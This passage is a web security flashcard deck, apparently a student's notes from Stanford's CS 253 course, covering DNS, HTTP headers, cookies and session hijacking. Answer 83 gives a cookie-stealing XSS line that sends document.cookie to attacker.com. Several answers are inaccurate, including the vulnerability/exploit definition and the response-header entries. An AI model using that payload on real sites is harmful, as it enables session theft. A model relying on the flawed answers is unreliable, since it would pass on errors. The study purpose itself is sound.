CS 253 Web Security Youtube Pt1

Question 1

What is the difference between a vulnerability and an exploit?

Answer 1

A vulnerability is a part of the site that makes it behave unexpectedly but does not allow one to insert malicious code, unlike an exploit

Question 2

What reasons are there to attack a computer system?

Answer 2

Spam - To trick people into clicking things

Denial of service - To attack competitors or seek ransom

Infect visiting users with malware - infect one server, use it to infect hundreds of thousands of clients

Data theft - credentials, credit card numbers, intellectual property

Mine cryptocurrency

Ransomware

Political motivations

Question 3

What does web security involves?

Answer 3

Browser security, server app security, client app security

It also involves actions to protect the user from:
- Social engineering
- Trackers (private data being leaked)

Question 4

Why is web security hard?

Answer 4

• The web wants to provide the ability to run anyone’s code on your computer securely. Run untrusted code securely.
• Different sites may interact with each other
• Websites have a lot of low-level features (hardware access)
• There is a desire for high performance
• APIs for web browsers were not design from first principles. They have evolved
• Web has strict backwards compatibility requirements. There can be no changes that break previous versions because they could break websites.

Question 5

What can websites do that constitute very high security risks?

Answer 5

• Download content from anywhere
• Spawn worker processes
• Open sockets to a server, or even to another user’s browser
• Display media in a huge number of formats
• Run custom code on the GPU
• Save/read data from the filesystem

Question 6

What does DNS stands for?

Answer 6

Domain Name System

Question 7

What is the Domain Name System?

Answer 7

A system that translates user friendly domain names into IP addresses

Question 8

How does DNS querying works?

Answer 8

The client machine sends the domain name to the DNS server and the server responds with the corresponding IP address.

Question 9

How does the DNS server works when performing a DNS query?

Answer 9

The client machine sends the domain name to the DNS server.

The DNS server uses the DNS Recursive Resolver to look up the answer for the domain name. It will continually perform queries to different servers asking if they have information on the domain name, until it gets a positive response.

The queried servers are called nameservers and there are multiple because one of them cannot allocate all of the existing domain names.

Question 10

What is a good example of a DNS querying process?

Answer 10

Let’s say we try to access the url: https://www.standford.edu

The client sends the domain name (standford.edu) to the DNS Server.

The DNS Server using the DNS Recursive Resolver queries the Root Nameserver. The Root Nameserver does not have the IP Address, so it responds with the instruction to query the “.edu” Nameserver.

The DNS Recursive Resolver queries the “.edu” Nameserver. The “.edu” Nameserver does not have the IP address, so it responds with the instruction to query the “standford.edu” Nameserver

The DNS Recursive Resolver queries the “standford.edu” Nameserver. The “standford.edu” Nameserver does have the IP address, so it returns it.

The DNS Recursive Resolver return the received IP address to the Client.

Question 11

What is a TLD Nameserver?

Answer 11

Its the nameserver that holds all instructions or addresses for a top-level domain.
Example:
.com
.org
.edu

Question 12

What does the TLD in a TLD Nameserver stands for?

Answer 12

Top-Level Domain Nameserver

Question 13

What is a top-level domain?

Answer 13

It is the part of the domain name after the dot that is used to indicate the type or category of a website.
Examples:
.com
.org
.edu

Question 14

What does SLD stands for, regarding domain names?

Answer 14

Second-Level Domain

Question 15

What is a second-level domain?

Answer 15

It is the part of the domain name before the dot that indicates the name of the website
Examples:

wikipedia.com = wikipedia
brainscape..com =- brainscape

Question 16

What is a Domain Nameserver?

Answer 16

The Nameserver that holds the information regarding a particular domain name

Question 17

What is DNS hijacking?

Answer 17

The attacker changes DNS records of target to point to own IP address. After this all site visitors will be directed to the web server of the attacker.

Question 18

What are the vectors (places) where you DNS hijacking can occur?

Answer 18

• Malware changes user’s local DNS settings
• Hacked recursive DNS resolver
• Hacked router
• Hacked DNS nameserver
• Compromised user account at DNS provider

Question 19

What does ISP stands for?

Answer 19

Internet Service Provider

Question 20

Why is it easy for ISPs to sell the lists of the DNS you have queried?

Answer 20

Because the queries are in plaintext .

Question 21

What can you do to try and avoid ISPs selling your DNS queries lists?

Answer 21

You can consider switching your DNS setting to use the Cloudflare server or any other provider that at least has a good privacy policy.

Question 22

What do HTTP Status Codes mean in general?

Answer 22

1xx - Informational, you need to hold on some time
2xx - Success
3xx - Redirection
4xx - Client error
5xx - Server error

Question 23

What are some well-known HTTP Success status codes?

Answer 23

200 - Ok - Request succeeded
204 - No Content - Request succeeded but answer is empty
206 - Partial Content - Request for specific byte range succeeded

Question 24

What are some well-known HTTP Redirection status codes?

Answer 24

301 - Moved Permanently - Resource has a new permanent URL
302 - Found - Resource temporarily resides at a different URL
304 - Not Modified - Resource has not been modified since last cached

Question 25

What are some well-known HTTP Client error codes?

Answer 25

400 - Bad Request - The request was malformed 401 - Unauthorized - Resource is protected, need to authorize 403 - Forbidden - Resource is protected, denying access 404 - Not Found - Resource was not found

Question 26

What are some well-known HTTP Server error codes?

Answer 26

500 - Internal Server Error - Generic Server Error 502 - Bad Gateway - Server is a proxy; backend server is unreachable 503 - Service Unavailable - Server is overloaded or down for maintenance 504 - Gateway Timeout - Server is a proxy, backend server responded too slowly

Question 27

What can an HTTP Proxy server do or be useful for?

Answer 27

It can: - Cache content - Block content (malware, adult content, etc) - Modify content - Sit in front of many servers (reverse proxy)

Question 28

What is a client-side proxy?

Answer 28

Its a proxy that sits between the client and the web retrieving resources from the internet. It is often used in corporate networks to control employee internet access, enforce content filters, and improve security.

Question 29

What is another name for a client-side proxy?

Answer 29

Forward proxy

Question 30

What is another name for a forward proxy?

Answer 30

A client-side proxy

Question 31

What are the HTTP headers and what are they good for?

Answer 31

They are essentially a amp of key-value pairs. They let the client and the server pass additional information with an HTTP request or response. and therefore it allows experimental extensions to be added to HTTP without requiring protocol changes.

Question 32

What are 11 of the most useful HTTP request headers?

Answer 32

Host User-Agent Referer Cookie Range Cache-Control If-Modified-Since Connection Accept Accept-Encoding Accept-Language

Question 33

What is the Host, HTTP request header used for?

Answer 33

It is meant to contain the domain name of the server

Question 34

What is the User Agent, HTTP request header used for?

Answer 34

It is meant to contain the name of the browser and operating system. Technically it contains not the name of the browser, but the name of the User Agent. Which is normally the browser.

Question 35

What is the Referer, HTTP request header used for?

Answer 35

It is meant to contain the webpage which led you to this page (The word Referer is misspelled, but that's how it is written in HTTP)

Question 36

What is the Cookie, HTTP request header used for?

Answer 36

It is meant to keep the cookie the server gave you earlier. This helps you to keep you logged in

Question 37

What is the Range, HTTP request header used for?

Answer 37

Specifies a subset of bytes to fetch. This is the same Range concept that is used for HTTP 206 response status code.

Question 38

What is the Cache-Control, HTTP request header used for?

Answer 38

Helps to specify if you want a cached response or not.

Question 39

What is the If-Modified-Since, HTTP request header used for?

Answer 39

Allows to specify a date time so that the response will only be updated if the resource has been modified since that datetime.

Question 40

What is the Connection, HTTP request header used for?

Answer 40

Sends instructions to control the TCP socket used for the request, either to maintain it opened or to close it. (keep-alive, close)

Question 41

What is the Accept, HTTP request header used for?

Answer 41

You can specify which type of response you will accept Example: text/html

Question 42

What is the Accept-Encoding, HTTP request header used for?

Answer 42

You can specify which encoding algorithms you understand. Example: gzip

Question 43

What is the Accept-Language, HTTP request header used for?

Answer 43

You can specify which language you expect. Example: es, en

Question 44

What are 12 of the most useful HTTP response headers?

Answer 44

Date Last-Modified Cache-Control Expires Vary Set-Cookie Location Connection Content-Type Content-Encoding Content-Language Content-Length

Question 45

What is the Date, HTTP response header used for?

Answer 45

It contains when the response was sent.

Question 46

What is the Last-Modified, HTTP response header used for?

Answer 46

It contains when the content was last modified.

Question 47

What is the Cache-Control, HTTP response header used for?

Answer 47

It specifies whether you want the client to cache the response or not

Question 48

What is the Expires, HTTP response header used for?

Answer 48

Contains a date to point out when the browser should discard the response from cache.

Question 49

What is the Vary, HTTP response header used for?

Answer 49

Contains a list of request headers which affect the response. So the browser will save and check the list of headers in new requests and if they are different it will not use the cache version. Otherwise it will use it.

Question 50

What is the Set-Cookie, HTTP response header used for?

Answer 50

Sets a cookie value on the client

Question 51

What is the Location, HTTP response header used for?

Answer 51

Used to redirec the client to another url. This has to be used alongside 3xx response.

Question 52

What is the Connection, HTTP response header used for?

Answer 52

Confirms the HTTP request header counterpart

Question 53

What is the Content-Type, HTTP response header used for?

Answer 53

Confirms the HTTP request header counterpart

Question 54

What is the Content-Encoding, HTTP response header used for?

Answer 54

Confirms the HTTP request header counterpart

Question 55

What is the Content-Language, HTTP response header used for?

Answer 55

Confirms the HTTP request header counterpart

Question 56

What is the Content-Length, HTTP response header used for?

Answer 56

Confirms the HTTP request header counterpart

Question 57

What does HTTP stands for?

Answer 57

Hypertext Transfer Protocol

Question 58

What does TLS stands for?

Answer 58

Transport Layer Security

Question 59

What does TCP stands for_

Answer 59

Transmission Control Protocol

Question 60

What does IP stands for

Answer 60

Internet Protocol

Question 61

What does the client need to do in order to find the IP of the site it wants to connect to?

Answer 61

It needs to request it through the DNS Server using the domain name

Question 62

What does the client do after getting the IP address>

Answer 62

It opens a connection using TCP

Question 63

What does the client does after openning the TCP connection?

Answer 63

It applies TLS encryption, although it is optional

Question 64

What does the client does after opening the TCP connection and applying (or not) the TLS encryption?

Answer 64

It makes the HTTP request by using the socket opened by TCP.

Question 65

What happens when you type a URL and press enter?

Answer 65

1. Performs a DNS lookup on the hostname (example.com) to get an IP address (1.2.3.4) 2. Opens a TCP socket to 1.2.3.4 on port 80 (The HTTP port) 3. Send an HTTP request that includes the desired path 4. Read the HTTP response from the socket 5. Parse the HTML into the DOM 6. Render the page based on the DOM 7. Repeat until all external resources are loaded: - If there are pending external resources, makes HTTP requests for these (runs steps 1 -4) - Renders the resources into the page.

Question 66

What is the syntax for a server to set a cookie on a client?

Answer 66

Set-Cookie: theme=dark;

Question 67

What is the syntax for a client to send a cookie to the server?

Answer 67

Cookie: theme=dark;

Question 68

What is a session?

Answer 68

The method in which a server keeps a set of data related to a user's current "browsing session"

Question 69

What are some examples in which sessions are commonly implemented?

Answer 69

Logins Shopping carts User tracking

Question 70

What does the term "Access Control" refers to?

Answer 70

To the act of regulating who can view resources in a web site or take actions.

Question 71

What does the term "Ambient Authority" refers to?

Answer 71

To implementing Access Control, based on a global and persistent property of the requester.

Question 72

Which types of Ambient Authority exist on the web?

Answer 72

4 in total: Cookies - the most common and most versatile method IP checking - used at Stanford for library resources. Built-in HTTP Authentication - rarely used Client Certificates - rarely used

Question 73

What are the signature schemes used normally for implementing Ambien Authority with Cookies?

Answer 73

The triple of algorithms - Generator - Signer - Verifier

Question 74

What does the generator function does?

Answer 74

It does not receive any input and returns a primary key and a secret key

Question 75

What does the Signer function does?

Answer 75

Receives the secret key and a value. It uses the secret key to perform a series of operations on the value and returns a value called tag. (Which is the signed value)

Question 76

What does the Verifier function does?

Answer 76

It receives the primary key, the original value and the signed value. Internally it performs a series of operations in order to check the validity of the tag generated from the original value.

Question 77

How does the process of requests work using the Ambient Authority with Cookies?

Answer 77

1. The server generates the pk and sk 2. The browser sends a POST login request 3. The server validates the user and password 4. The server signs the username value and generates a tag 5. Server sends back the tag and the username as cookies with the Set-Cookie header 6. The Browser sets both cookies as instructed by the server 7. The Browser sends future requests with both username and tag in the Cookie header 8. The server validates if the tag and username are valid for one another

Question 78

What are some cookie attributes you can specify?

Answer 78

Expires - Specifies expiration date. If no date, then lasts for a session Path - Scope the "Cookie" header to a particular request path prefix Domain - Allows the cookie to be scoped to a domain broader than the domain that returned the Set-Cookie header

Question 79

What is the format for the Set-Cookie header sent by the server?

Answer 79

Example: Set-Cookie: theme=dark;Expires=;

Question 80

How does Session hijacking works?

Answer 80

When sending cookies over unencrypted HTTP anyone can intercept the cookies and use them to hijack the user's session. Once the attacker has the cookie, he can send the victim's cookie as if it were his own and the server will be fooled into thinking he is the owner of the session.

Question 81

How can you mitigate a Session hijacking attack?

Answer 81

1. You can add the Secure cookie attribute to prevent cookie from bein sent over unencrypted HTTP connections. Set-Cookie: key=value; Secure 2. You use HTTPS over the entire website

Question 82

Why does using HTTPS mitigates a Session hijacking attack?

Answer 82

Because the data transferred during HTTPS communication is encrypted.

Question 83

What is a very common form of JS code used in Session hijacking via Cross Site Scripting?

Answer 83

new Image().src = 'https://attacker.com/steal?cookie=' + document.cookie

Question 84

What does XSS stands for?

Answer 84

Cross Site Scripting

Question 85

What can you do to protect your cookies from XSS?

Answer 85

You can add the attribute HttpOnly to your Set-Cookie header. This way the cookies will not be accesible through Javascript. Only through HTTP. Set-Cokkie: key=value; Secure; HttpOnly

Question 86

Why would one attempt to use the Path attribute for security?

Answer 86

Because the Path attribute allows you to limit the sharing of a cookie to only a specific url path and therefore on paper it wouldn't allow other unwanted paths to access the cookie.

Question 87

Why is it not recommended to use the Path attribute for security?

Answer 87

Because the Path attribute does not protect against unauthorized reading of the cookie from a different path on the same origin. It can be bypassed using an